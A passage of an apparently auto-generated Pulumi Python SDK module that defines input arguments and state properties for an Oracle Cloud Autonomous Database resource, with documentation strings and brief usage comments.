:param pulumi.Input[str] switchover_to: It is applicable only when `is_data_guard_enabled` is true. Could be set to `PRIMARY` or `STANDBY`. Default value is `PRIMARY`.
:param pulumi.Input[str] timestamp: The timestamp specified for the point-in-time clone of the source Autonomous Database. The timestamp must be in the past.
:param pulumi.Input[str] vault_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the Oracle Cloud Infrastructure [vault](https://docs.cloud.oracle.com/iaas/Content/KeyManagement/Concepts/keyoverview.htm#concepts).
:param pulumi.Input[Sequence[pulumi.Input[str]]] whitelisted_ips: (Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
"""
pulumi.set(__self__, "compartment_id", compartment_id)
pulumi.set(__self__, "db_name", db_name)
if admin_password is not None:
pulumi.set(__self__, "admin_password", admin_password)
if are_primary_whitelisted_ips_used is not None:
pulumi.set(__self__, "are_primary_whitelisted_ips_used", are_primary_whitelisted_ips_used)
if autonomous_container_database_id is not None:
pulumi.set(__self__, "autonomous_container_database_id", autonomous_container_database_id)
if autonomous_database_backup_id is not None:
pulumi.set(__self__, "autonomous_database_backup_id", autonomous_database_backup_id)
if autonomous_database_id is not None:
pulumi.set(__self__, "autonomous_database_id", autonomous_database_id)
if autonomous_maintenance_schedule_type is not None:
pulumi.set(__self__, "autonomous_maintenance_schedule_type", autonomous_maintenance_schedule_type)
if clone_type is not None:
pulumi.set(__self__, "clone_type", clone_type)
if cpu_core_count is not None:
pulumi.set(__self__, "cpu_core_count", cpu_core_count)
if customer_contacts is not None:
pulumi.set(__self__, "customer_contacts", customer_contacts)
if data_safe_status is not None:
pulumi.set(__self__, "data_safe_status", data_safe_status)
if data_storage_size_in_gb is not None:
pulumi.set(__self__, "data_storage_size_in_gb", data_storage_size_in_gb)
if data_storage_size_in_tbs is not None:
pulumi.set(__self__, "data_storage_size_in_tbs", data_storage_size_in_tbs)
if db_version is not None:
pulumi.set(__self__, "db_version", db_version)
if db_workload is not None:
pulumi.set(__self__, "db_workload", db_workload)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if is_access_control_enabled is not None:
pulumi.set(__self__, "is_access_control_enabled", is_access_control_enabled)
if is_auto_scaling_enabled is not None:
pulumi.set(__self__, "is_auto_scaling_enabled", is_auto_scaling_enabled)
if is_data_guard_enabled is not None:
pulumi.set(__self__, "is_data_guard_enabled", is_data_guard_enabled)
if is_dedicated is not None:
pulumi.set(__self__, "is_dedicated", is_dedicated)
if is_free_tier is not None:
pulumi.set(__self__, "is_free_tier", is_free_tier)
if is_preview_version_with_service_terms_accepted is not None:
pulumi.set(__self__, "is_preview_version_with_service_terms_accepted", is_preview_version_with_service_terms_accepted)
if is_refreshable_clone is not None:
pulumi.set(__self__, "is_refreshable_clone", is_refreshable_clone)
if kms_key_id is not None:
pulumi.set(__self__, "kms_key_id", kms_key_id)
if license_model is not None:
pulumi.set(__self__, "license_model", license_model)
if nsg_ids is not None:
pulumi.set(__self__, "nsg_ids", nsg_ids)
if ocpu_count is not None:
pulumi.set(__self__, "ocpu_count", ocpu_count)
if open_mode is not None:
pulumi.set(__self__, "open_mode", open_mode)
if operations_insights_status is not None:
pulumi.set(__self__, "operations_insights_status", operations_insights_status)
if permission_level is not None:
pulumi.set(__self__, "permission_level", permission_level)
if private_endpoint_label is not None:
pulumi.set(__self__, "private_endpoint_label", private_endpoint_label)
if refreshable_mode is not None:
pulumi.set(__self__, "refreshable_mode", refreshable_mode)
if rotate_key_trigger is not None:
pulumi.set(__self__, "rotate_key_trigger", rotate_key_trigger)
if source is not None:
pulumi.set(__self__, "source", source)
if source_id is not None:
pulumi.set(__self__, "source_id", source_id)
if standby_whitelisted_ips is not None:
pulumi.set(__self__, "standby_whitelisted_ips", standby_whitelisted_ips)
if state is not None:
pulumi.set(__self__, "state", state)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if switchover_to is not None:
pulumi.set(__self__, "switchover_to", switchover_to)
if timestamp is not None:
pulumi.set(__self__, "timestamp", timestamp)
if vault_id is not None:
pulumi.set(__self__, "vault_id", vault_id)
if whitelisted_ips is not None:
pulumi.set(__self__, "whitelisted_ips", whitelisted_ips)
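# Example (illustrative): constructing the args object directly. Optional
# arguments left as None are not recorded on the object (see the None guards
# above), so the provider applies its own defaults for them.
#
#   args = AutonomousDatabaseArgs(
#       compartment_id="ocid1.compartment.oc1..exampleuniqueID",  # placeholder OCID
#       db_name="exampledb",
#       is_auto_scaling_enabled=True)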
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Input[str]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment of the Autonomous Database.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: pulumi.Input[str]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="dbName")
def db_name(self) -> pulumi.Input[str]:
"""
The database name. The name must begin with an alphabetic character and can contain a maximum of 14 alphanumeric characters. Special characters are not permitted. The database name must be unique in the tenancy.
"""
return pulumi.get(self, "db_name")
@db_name.setter
def db_name(self, value: pulumi.Input[str]):
pulumi.set(self, "db_name", value)
@property
@pulumi.getter(name="adminPassword")
def admin_password(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The password must be between 12 and 30 characters long, and must contain at least 1 uppercase, 1 lowercase, and 1 numeric character. It cannot contain the double quote symbol (") or the username "admin", regardless of casing. The password is mandatory if source value is "BACKUP_FROM_ID", "BACKUP_FROM_TIMESTAMP", "DATABASE" or "NONE".
"""
return pulumi.get(self, "admin_password")
@admin_password.setter
def admin_password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "admin_password", value)
@property
@pulumi.getter(name="arePrimaryWhitelistedIpsUsed")
def are_primary_whitelisted_ips_used(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) This field is null if the Autonomous Database is not Data Guard enabled or Access Control is disabled. Its value is `TRUE` if the Autonomous Database is Data Guard enabled, Access Control is enabled, and the Autonomous Database uses the primary's IP access control list (ACL) for the standby. Its value is `FALSE` if the Autonomous Database is Data Guard enabled, Access Control is enabled, and the Autonomous Database uses a different IP access control list (ACL) for the standby than for the primary.
"""
return pulumi.get(self, "are_primary_whitelisted_ips_used")
@are_primary_whitelisted_ips_used.setter
def are_primary_whitelisted_ips_used(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "are_primary_whitelisted_ips_used", value)
@property
@pulumi.getter(name="autonomousContainerDatabaseId")
def autonomous_container_database_id(self) -> Optional[pulumi.Input[str]]:
"""
The Autonomous Container Database [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
"""
return pulumi.get(self, "autonomous_container_database_id")
@autonomous_container_database_id.setter
def autonomous_container_database_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "autonomous_container_database_id", value)
@property
@pulumi.getter(name="autonomousDatabaseBackupId")
def autonomous_database_backup_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database Backup that you will clone to create a new Autonomous Database.
"""
return pulumi.get(self, "autonomous_database_backup_id")
@autonomous_database_backup_id.setter
def autonomous_database_backup_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "autonomous_database_backup_id", value)
@property
@pulumi.getter(name="autonomousDatabaseId")
def autonomous_database_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
"""
return pulumi.get(self, "autonomous_database_id")
@autonomous_database_id.setter
def autonomous_database_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "autonomous_database_id", value)
@property
@pulumi.getter(name="autonomousMaintenanceScheduleType")
def autonomous_maintenance_schedule_type(self) -> Optional[pulumi.Input[str]]:
"""
The maintenance schedule type of the Autonomous Database on shared Exadata infrastructure. The EARLY maintenance schedule applies patches prior to the REGULAR schedule. The REGULAR maintenance schedule follows the normal cycle.
"""
return pulumi.get(self, "autonomous_maintenance_schedule_type")
@autonomous_maintenance_schedule_type.setter
def autonomous_maintenance_schedule_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "autonomous_maintenance_schedule_type", value)
@property
@pulumi.getter(name="cloneType")
def clone_type(self) -> Optional[pulumi.Input[str]]:
"""
The Autonomous Database clone type.
"""
return pulumi.get(self, "clone_type")
@clone_type.setter
def clone_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "clone_type", value)
@property
@pulumi.getter(name="cpuCoreCount")
def cpu_core_count(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The number of OCPU cores to be made available to the database. For Autonomous Databases on dedicated Exadata infrastructure, the maximum number of cores is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
"""
return pulumi.get(self, "cpu_core_count")
@cpu_core_count.setter
def cpu_core_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cpu_core_count", value)
@property
@pulumi.getter(name="customerContacts")
def customer_contacts(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AutonomousDatabaseCustomerContactArgs']]]]:
"""
(Updatable) Customer Contacts.
"""
return pulumi.get(self, "customer_contacts")
@customer_contacts.setter
def customer_contacts(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AutonomousDatabaseCustomerContactArgs']]]]):
pulumi.set(self, "customer_contacts", value)
@property
@pulumi.getter(name="dataSafeStatus")
def data_safe_status(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Status of the Data Safe registration for this Autonomous Database. Could be REGISTERED or NOT_REGISTERED.
"""
return pulumi.get(self, "data_safe_status")
@data_safe_status.setter
def data_safe_status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data_safe_status", value)
@property
@pulumi.getter(name="dataStorageSizeInGb")
def data_storage_size_in_gb(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The size, in gigabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. The maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
"""
return pulumi.get(self, "data_storage_size_in_gb")
@data_storage_size_in_gb.setter
def data_storage_size_in_gb(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "data_storage_size_in_gb", value)
@property
@pulumi.getter(name="dataStorageSizeInTbs")
def data_storage_size_in_tbs(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The size, in terabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. For Autonomous Databases on dedicated Exadata infrastructure, the maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
"""
return pulumi.get(self, "data_storage_size_in_tbs")
@data_storage_size_in_tbs.setter
def data_storage_size_in_tbs(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "data_storage_size_in_tbs", value)
@property
@pulumi.getter(name="dbVersion")
def db_version(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) A valid Oracle Database version for Autonomous Database. The `db_workload` values AJD and APEX are only supported for `db_version` `19c` and later.
"""
return pulumi.get(self, "db_version")
@db_version.setter
def db_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "db_version", value)
@property
@pulumi.getter(name="dbWorkload")
def db_workload(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The Autonomous Database workload type. The following values are valid:
* OLTP - indicates an Autonomous Transaction Processing database
* DW - indicates an Autonomous Data Warehouse database
* AJD - indicates an Autonomous JSON Database
* APEX - indicates an Autonomous Database with the Oracle APEX Application Development workload type. Note: `db_workload` can only be updated from AJD to OLTP, or from a free OLTP to AJD.
"""
return pulumi.get(self, "db_workload")
@db_workload.setter
def db_workload(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "db_workload", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The user-friendly name for the Autonomous Database. The name does not have to be unique.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="isAccessControlEnabled")
def is_access_control_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Indicates if the database-level access control is enabled. If disabled, database access is defined by the network security rules. If enabled, database access is restricted to the IP addresses defined by the rules specified with the `whitelistedIps` property. While specifying `whitelistedIps` rules is optional, if database-level access control is enabled and no rules are specified, the database will become inaccessible. The rules can be added later using the `UpdateAutonomousDatabase` API operation or edit option in console. When creating a database clone, the desired access control setting should be specified. By default, database-level access control will be disabled for the clone.
"""
return pulumi.get(self, "is_access_control_enabled")
@is_access_control_enabled.setter
def is_access_control_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_access_control_enabled", value)
@property
@pulumi.getter(name="isAutoScalingEnabled")
def is_auto_scaling_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Indicates if auto scaling is enabled for the Autonomous Database OCPU core count. The default value is `FALSE`.
"""
return pulumi.get(self, "is_auto_scaling_enabled")
@is_auto_scaling_enabled.setter
def is_auto_scaling_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_auto_scaling_enabled", value)
@property
@pulumi.getter(name="isDataGuardEnabled")
def is_data_guard_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Indicates whether the Autonomous Database has Data Guard enabled.
"""
return pulumi.get(self, "is_data_guard_enabled")
@is_data_guard_enabled.setter
def is_data_guard_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_data_guard_enabled", value)
@property
@pulumi.getter(name="isDedicated")
def is_dedicated(self) -> Optional[pulumi.Input[bool]]:
"""
True if the database is on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm).
"""
return pulumi.get(self, "is_dedicated")
@is_dedicated.setter
def is_dedicated(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_dedicated", value)
@property
@pulumi.getter(name="isFreeTier")
def is_free_tier(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Indicates if this is an Always Free resource. The default value is false. Note that Always Free Autonomous Databases have 1 CPU and 20GB of memory. For Always Free databases, memory and CPU cannot be scaled. When `db_workload` is `AJD` or `APEX` it cannot be `true`.
"""
return pulumi.get(self, "is_free_tier")
@is_free_tier.setter
def is_free_tier(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_free_tier", value)
@property
@pulumi.getter(name="isPreviewVersionWithServiceTermsAccepted")
def is_preview_version_with_service_terms_accepted(self) -> Optional[pulumi.Input[bool]]:
"""
If set to `TRUE`, indicates that an Autonomous Database preview version is being provisioned, and that the preview version's terms of service have been accepted. Note that preview version software is only available for databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI).
"""
return pulumi.get(self, "is_preview_version_with_service_terms_accepted")
@is_preview_version_with_service_terms_accepted.setter
def is_preview_version_with_service_terms_accepted(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_preview_version_with_service_terms_accepted", value)
@property
@pulumi.getter(name="isRefreshableClone")
def is_refreshable_clone(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) True for creating a refreshable clone; False for detaching the clone from the source Autonomous Database. Detaching is a one-time operation, and the clone becomes a regular Autonomous Database.
"""
return pulumi.get(self, "is_refreshable_clone")
@is_refreshable_clone.setter
def is_refreshable_clone(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_refreshable_clone", value)
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of the key container that is used as the master encryption key in database transparent data encryption (TDE) operations.
"""
return pulumi.get(self, "kms_key_id")
@kms_key_id.setter
def kms_key_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_id", value)
@property
@pulumi.getter(name="licenseModel")
def license_model(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The Oracle license model that applies to the Oracle Autonomous Database. Bring your own license (BYOL) allows you to apply your current on-premises Oracle software licenses to equivalent, highly automated Oracle PaaS and IaaS services in the cloud. License Included allows you to subscribe to new Oracle Database software licenses and the Database service. Note that when provisioning an Autonomous Database on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm), this attribute must be null because the attribute is already set at the Autonomous Exadata Infrastructure level. When using [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI), if a value is not specified, the system will supply the value of `BRING_YOUR_OWN_LICENSE`. It is a required field when `db_workload` is AJD and must be set to `LICENSE_INCLUDED`, as AJD does not support the default `license_model` value `BRING_YOUR_OWN_LICENSE`.
"""
return pulumi.get(self, "license_model")
@license_model.setter
def license_model(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "license_model", value)
@property
@pulumi.getter(name="nsgIds")
def nsg_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) A list of the [OCIDs](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the network security groups (NSGs) that this resource belongs to. Setting this to an empty array after the list is created removes the resource from all NSGs. For more information about NSGs, see [Security Rules](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/securityrules.htm). **NsgIds restrictions:**
* Autonomous Databases with private access require at least 1 Network Security Group (NSG). The nsgIds array cannot be empty.
"""
return pulumi.get(self, "nsg_ids")
@nsg_ids.setter
def nsg_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "nsg_ids", value)
@property
@pulumi.getter(name="ocpuCount")
def ocpu_count(self) -> Optional[pulumi.Input[float]]:
"""
(Updatable) The number of OCPU cores to be made available to the database.
"""
return pulumi.get(self, "ocpu_count")
@ocpu_count.setter
def ocpu_count(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "ocpu_count", value)
@property
@pulumi.getter(name="openMode")
def open_mode(self) -> Optional[pulumi.Input[str]]:
"""
The `DATABASE OPEN` mode. You can open the database in `READ_ONLY` or `READ_WRITE` mode.
"""
return pulumi.get(self, "open_mode")
@open_mode.setter
def open_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "open_mode", value)
@property
@pulumi.getter(name="operationsInsightsStatus")
def operations_insights_status(self) -> Optional[pulumi.Input[str]]:
"""
Status of Operations Insights for this Autonomous Database.
"""
return pulumi.get(self, "operations_insights_status")
@operations_insights_status.setter
def operations_insights_status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "operations_insights_status", value)
@property
@pulumi.getter(name="permissionLevel")
def permission_level(self) -> Optional[pulumi.Input[str]]:
"""
The Autonomous Database permission level. Restricted mode allows access only to admin users.
"""
return pulumi.get(self, "permission_level")
@permission_level.setter
def permission_level(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "permission_level", value)
@property
@pulumi.getter(name="privateEndpointLabel")
def private_endpoint_label(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The private endpoint label for the resource.
"""
return pulumi.get(self, "private_endpoint_label")
@private_endpoint_label.setter
def private_endpoint_label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_endpoint_label", value)
@property
@pulumi.getter(name="refreshableMode")
def refreshable_mode(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The refresh mode of the clone. AUTOMATIC indicates that the clone is automatically being refreshed with data from the source Autonomous Database.
"""
return pulumi.get(self, "refreshable_mode")
@refreshable_mode.setter
def refreshable_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "refreshable_mode", value)
@property
@pulumi.getter(name="rotateKeyTrigger")
def rotate_key_trigger(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) An optional property that, when flipped, triggers rotation of the KMS key. It is applicable only to dedicated databases, i.e. where `is_dedicated` is true.
"""
return pulumi.get(self, "rotate_key_trigger")
@rotate_key_trigger.setter
def rotate_key_trigger(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "rotate_key_trigger", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input[str]]:
"""
The source of the database: Use `NONE` for creating a new Autonomous Database. Use `DATABASE` for creating a new Autonomous Database by cloning an existing Autonomous Database.
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source", value)
@property
@pulumi.getter(name="sourceId")
def source_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
"""
return pulumi.get(self, "source_id")
@source_id.setter
def source_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_id", value)
@property
@pulumi.getter(name="standbyWhitelistedIps")
def standby_whitelisted_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
"""
return pulumi.get(self, "standby_whitelisted_ips")
@standby_whitelisted_ips.setter
def standby_whitelisted_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "standby_whitelisted_ips", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The current state of the Autonomous Database. It can be set to `AVAILABLE` or `STOPPED`.
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet the resource is associated with.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="switchoverTo")
def switchover_to(self) -> Optional[pulumi.Input[str]]:
"""
Applicable only when `is_data_guard_enabled` is true. It can be set to `PRIMARY` or `STANDBY`. The default value is `PRIMARY`.
"""
return pulumi.get(self, "switchover_to")
@switchover_to.setter
def switchover_to(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "switchover_to", value)
@property
@pulumi.getter
def timestamp(self) -> Optional[pulumi.Input[str]]:
"""
The timestamp specified for the point-in-time clone of the source Autonomous Database. The timestamp must be in the past.
"""
return pulumi.get(self, "timestamp")
@timestamp.setter
def timestamp(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "timestamp", value)
@property
@pulumi.getter(name="vaultId")
def vault_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the Oracle Cloud Infrastructure [vault](https://docs.cloud.oracle.com/iaas/Content/KeyManagement/Concepts/keyoverview.htm#concepts).
"""
return pulumi.get(self, "vault_id")
@vault_id.setter
def vault_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vault_id", value)
@property
@pulumi.getter(name="whitelistedIps")
def whitelisted_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
"""
return pulumi.get(self, "whitelisted_ips")
@whitelisted_ips.setter
def whitelisted_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "whitelisted_ips", value)
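# The args class above maps the snake_case Python names to the provider's
# camelCase properties via `pulumi.getter(name=...)`. A minimal, hypothetical
# Pulumi program exercising a few of these inputs might look like the sketch
# below (names such as `compartment_ocid` and the chosen argument values are
# illustrative assumptions, not part of this module; required arguments are
# governed by the provider schema):
#
#     import pulumi
#     import pulumi_oci as oci
#
#     adb = oci.database.AutonomousDatabase("example",
#         compartment_id=compartment_ocid,        # assumed defined elsewhere
#         db_name="exampledb",
#         admin_password=admin_password_secret,   # assumed pulumi secret
#         cpu_core_count=1,
#         data_storage_size_in_tbs=1,
#         is_auto_scaling_enabled=True,
#         whitelisted_ips=["203.0.113.10"])       # client IP ACL
#
#     pulumi.export("adb_state", adb.state)
#
# This is a sketch under the assumptions noted above; consult the provider
# documentation for the authoritative set of required arguments.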
@pulumi.input_type
class _AutonomousDatabaseState:
def __init__(__self__, *,
admin_password: Optional[pulumi.Input[str]] = None,
apex_details: Optional[pulumi.Input['AutonomousDatabaseApexDetailsArgs']] = None,
are_primary_whitelisted_ips_used: Optional[pulumi.Input[bool]] = None,
autonomous_container_database_id: Optional[pulumi.Input[str]] = None,
autonomous_database_backup_id: Optional[pulumi.Input[str]] = None,
autonomous_database_id: Optional[pulumi.Input[str]] = None,
autonomous_maintenance_schedule_type: Optional[pulumi.Input[str]] = None,
available_upgrade_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
backup_config: Optional[pulumi.Input['AutonomousDatabaseBackupConfigArgs']] = None,
clone_type: Optional[pulumi.Input[str]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
connection_strings: Optional[pulumi.Input['AutonomousDatabaseConnectionStringsArgs']] = None,
connection_urls: Optional[pulumi.Input['AutonomousDatabaseConnectionUrlsArgs']] = None,
cpu_core_count: Optional[pulumi.Input[int]] = None,
customer_contacts: Optional[pulumi.Input[Sequence[pulumi.Input['AutonomousDatabaseCustomerContactArgs']]]] = None,
data_safe_status: Optional[pulumi.Input[str]] = None,
data_storage_size_in_gb: Optional[pulumi.Input[int]] = None,
data_storage_size_in_tbs: Optional[pulumi.Input[int]] = None,
db_name: Optional[pulumi.Input[str]] = None,
db_version: Optional[pulumi.Input[str]] = None,
db_workload: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
failed_data_recovery_in_seconds: Optional[pulumi.Input[int]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
infrastructure_type: Optional[pulumi.Input[str]] = None,
is_access_control_enabled: Optional[pulumi.Input[bool]] = None,
is_auto_scaling_enabled: Optional[pulumi.Input[bool]] = None,
is_data_guard_enabled: Optional[pulumi.Input[bool]] = None,
is_dedicated: Optional[pulumi.Input[bool]] = None,
is_free_tier: Optional[pulumi.Input[bool]] = None,
is_preview: Optional[pulumi.Input[bool]] = None,
is_preview_version_with_service_terms_accepted: Optional[pulumi.Input[bool]] = None,
is_refreshable_clone: Optional[pulumi.Input[bool]] = None,
key_history_entries: Optional[pulumi.Input[Sequence[pulumi.Input['AutonomousDatabaseKeyHistoryEntryArgs']]]] = None,
key_store_id: Optional[pulumi.Input[str]] = None,
key_store_wallet_name: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
kms_key_lifecycle_details: Optional[pulumi.Input[str]] = None,
license_model: Optional[pulumi.Input[str]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
nsg_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ocpu_count: Optional[pulumi.Input[float]] = None,
open_mode: Optional[pulumi.Input[str]] = None,
operations_insights_status: Optional[pulumi.Input[str]] = None,
permission_level: Optional[pulumi.Input[str]] = None,
private_endpoint: Optional[pulumi.Input[str]] = None,
private_endpoint_ip: Optional[pulumi.Input[str]] = None,
